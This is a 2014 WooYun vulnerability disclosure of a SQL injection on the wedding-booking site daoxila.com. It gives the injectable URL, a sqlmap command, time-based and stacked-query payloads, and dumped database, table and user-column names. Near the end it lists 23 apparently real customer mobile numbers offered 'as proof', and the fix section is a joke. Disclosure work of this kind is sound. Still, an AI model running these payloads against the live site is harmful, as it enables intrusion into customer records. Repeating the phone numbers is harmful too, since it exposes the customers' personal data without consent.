当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-077782

漏洞标题:到喜啦SQL注入一枚泄露用户订单等信息

相关厂商:到喜啦

漏洞作者: 小饼仔

提交时间:2014-09-29 15:47

修复时间:2014-11-13 15:48

公开时间:2014-11-13 15:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-09-29: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-11-13: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

早上出门坐电梯,然后看到到喜啦的广告,婚宴预订。
一看到这个,就想到结婚要请客、买车、买房、要养孩子...都要花钱,恩,我得努力找一份薪水高的工作,听说用挖掘机炒菜工资高,特意来此请教一个问题,学挖掘机技术哪家强?

详细说明:

注入点:http://qd.daoxila.com/hotel/all-image?id=1201


sqlmap:
python sqlmap.py -u "http://qd.daoxila.com/hotel/all-image?id=1201" --
is-dba  --dbs --current-user --current-db
---
Place: GET
Parameter: id
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries
    Payload: id=1201; SELECT SLEEP(5)--
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1201 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0.11
current user:    'dxl_reim@%'
current user is DBA:    False

漏洞证明:

跑的比较慢,但是还是可以跑出来的
数据库:
available databases [10]:
[*] api
[*] dxl_api
[*] dxl_auth
[*] dxl_event
[*] dxl_exodus
[*] dxl_info
[*] dxl_log
[*] dxl_sms
[*] information_schema
[*] test


Database: dxl_exodus
[272 tables] 列出部分
| bd_accepu_history                    |
| bd_aonfirm                           |
| bd_confirm_loj                       |
| bd_confirm_user_cnntact              |
| bd_order_final                       |
| bd_order_fistory                     |
| biz_accmuntA                         |
| biz_account_detail_image             |
| biz_account_detbil                   |
| biz_alias                            |
| biz_order                            |
| biz_order_appeal                     |
| biz_order_apply_log                  |
| biz_order_follow_log                 |
| biz_user                             |
| biz_user_new                         |
| biz_user_qotel                       |
| biz_user_rel                         |
| biz_view_log                         |
| bmz_order_appeal_detail              |
| ex_album_biz_user                    |
| ex_album_pqoto                       |
| ex_album_server                      |
| ex_album_sms                         |
| ex_album_user                        |
| ex_announcement                      |
| ex_app_ad                            |
| ex_app_ad_city                       |
| ex_app_ad_click                      |
| ex_app_ad_platform                   |
| ex_app_ad_target                     |
| ex_app_davorite                      |
| ex_app_opinion                       |
| ex_app_oush_log                      |
| ex_app_recommend                     |
| ex_article                           |
| ex_article_image                     |
| ex_auth                              |
| ex_auth_role                         |
| ex_black_list_ip                     |
| ex_clbum                             |
| ex_config_china_city                 |
| ex_config_hotel_lgvel                |
| ex_config_hotel_status               |
| ex_config_image                      |
| ex_config_notice_stctus              |
| ex_config_notice_szpe                |
| ex_config_order_hotel_statuv         |
| ex_config_order_referral_source      |
| ex_config_order_status               |
| ex_config_orderconfirm_statws        |
| ex_config_tag                        |
| ex_config_user_relative              |
| ex_config_userorder                  |
| ex_config_userorder_source           |
| ex_curstom_order                     |
| ex_curstomer                         |
| ex_dict                              |
| ex_event                             |
| ex_event_images                      |
| ex_event_uelated_hotel               |
| ex_event_wedding_card                |
| ex_eventorder                        |
| ex_gift                              |
| ex_gift_authorize_orqer              |
| ex_gift_image                        |
| ex_gift_order                        |
| ex_hot_hotel                         |
| ex_hot_l                             |
| ex_hotel_ad                          |
| ex_hotel_ad_item                     |
| ex_hotel_auth_review                 |
| ex_hotel_contact_old                 |
| ex_hotel_event                       |
| ex_hotel_ext                         |
| ex_hotel_ext_feature                 |
| ex_hotel_ext_menu                    |
| ex_hotel_hall                        |
| ex_hotel_hall_schqdule               |
| ex_mall_biz_ext                      |
| ex_mall_biz_url                      |
| ex_mall_biz_user                     |
| ex_mall_consumer_detqil              |
| ex_mall_image                        |
| ex_mall_order                        |
| ex_mall_order_copy                   |
| ex_mall_order_demand                 |
| ex_mall_order_demand_comment         |
| ex_mall_order_demand_item            |
| ex_mall_order_demand_refeural        |
| ex_mall_order_log                    |
| ex_mall_order_rebate                 |
| ex_mall_order_referral               |
| ex_mall_rebate                       |
| ex_mall_user                         |
| ex_newcomers_say                     |
| ex_notice                            |
| ex_oaen                              |
| ex_order                             |
| ex_order_400                         |
| ex_order_assign                      |
| ex_order_cancel                      |
| ex_order_cancel_comment              |
| ex_order_cancel_image                |
| ex_order_cancel_qift                 |
| ex_order_cheat                       |
| ex_order_cheat_log                   |
| ex_order_city                        |
| ex_order_comment                     |
| ex_order_confirm                     |
| ex_order_confirm_final               |
| ex_order_duplicate                   |
| ex_order_gift                        |
| ex_order_gift_list                   |
| ex_order_gift_special                |
| ex_order_gift_special_list           |
| ex_order_gift_temp                   |
| ex_order_groq@_assign                |
| ex_order_hotel                       |
| ex_order_image                       |
| ex_order_item                        |
| ex_order_message                     |
| ex_order_other                       ||
| ex_pocode                            |
| ex_popedim                           |
| ex_popedom_ext                       |
| ex_rank                              |
| ex_search_temp                       |
| ex_seckill                           |
| ex_seckill_notice                    |
| ex_seckill_user                      |
| ex_service_goodday                   |
| ex_service_register                  |
| ex_shorturl                          |
| ex_sms_tpl                           |
| ex_sms_tpl_class                     |
| ex_sms_tpl_log                       |
| ex_sourci                            |
| ex_system_config                     |
| ex_tag                               |
| ex_tag_and_item_temp                 |
| ex_tag_article                       |
| ex_tag_city                          |
| ex_tag_click_count                   |
| ex_tag_item                          |
| ex_tag_manager_code_itea             |
| ex_tag_manager_cqde                  |
| ex_tag_manager_rule                  |
| ex_tag_manager_rule_item             |
| ex_tag_related_price                 |
| ex_tag_url_log                       |
| pro_recood                           |
| pro_useq_uari                        |
| pro_user_fridndG                     |
| res_hirtngw_Eatdgory                 |
| res_partner_iyfh                     |
| res_partner_ofsotrcH                 |
| thirdcal@_lum                        |
| thirdcall_rgl8sed                    |
| wed_biz_rebbre_deeailF               |
| wed_demand_ordeu_dHtail              |
| wed_lngin_ior                        |
| wed_orderNrTfc                       |
+--------------------------------------+


[14:54:51] [INFO] fetching columns for table 'ex_user' in database 'dxl_exodus'
[14:54:51] [INFO] resumed: 27
[14:54:51] [INFO] resumed: id
[14:54:51] [INFO] resumed: name
[14:54:51] [INFO] resumed: email
[14:54:51] [INFO] resumed: mobile
[14:54:51] [INFO] resumed: password
[14:54:51] [INFO] resumed: unique_code
[14:54:51] [INFO] resumed: realname
[14:54:51] [INFO] resumed: sex
[14:54:51] [INFO] resumed: city
[14:54:51] [INFO] resumed: address
[14:54:51] [INFO] resumed: zipcode
[14:54:51] [INFO] resumed: tel
[14:54:51] [INFO] resumed: msn
[14:54:51] [INFO] resumed: qq
[14:54:51] [INFO] resumed: avatar_id
[14:54:51] [INFO] resumed: identify_id
[14:54:51] [INFO] resumed: is_identified
[14:54:51] [INFO] resumed: dateline
[14:54:51] [INFO] resumed: last_visit
[14:54:51] [INFO] resumed: source
[14:54:51] [INFO] resumed: source_detail
[14:54:51] [INFO] resumed: verified
[14:54:51] [INFO] resumed: verified_from


附上一些user电话,只是为了证明,没做坏事
13901979622
13801616398
15921201542
13565741178
15801930251
13524333561
13564370159
13912667001
13917736077
13585649192
13621712724
13585704436
13761458459
13917641042
13817796226
13402134205
13671837521
13764968810
13636341635
13818621153
13916665988
13817695089
13774221443

修复方案:

济南山东找蓝翔

版权声明:转载请注明来源 小饼仔@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞评价:

评论

  1. 2014-09-29 18:03 | 茜茜公主 ( 普通白帽子 | Rank:2360 漏洞数:406 | 家里二宝出生,这几个月忙着把屎把尿...忒...)

    当然是山东蓝翔技校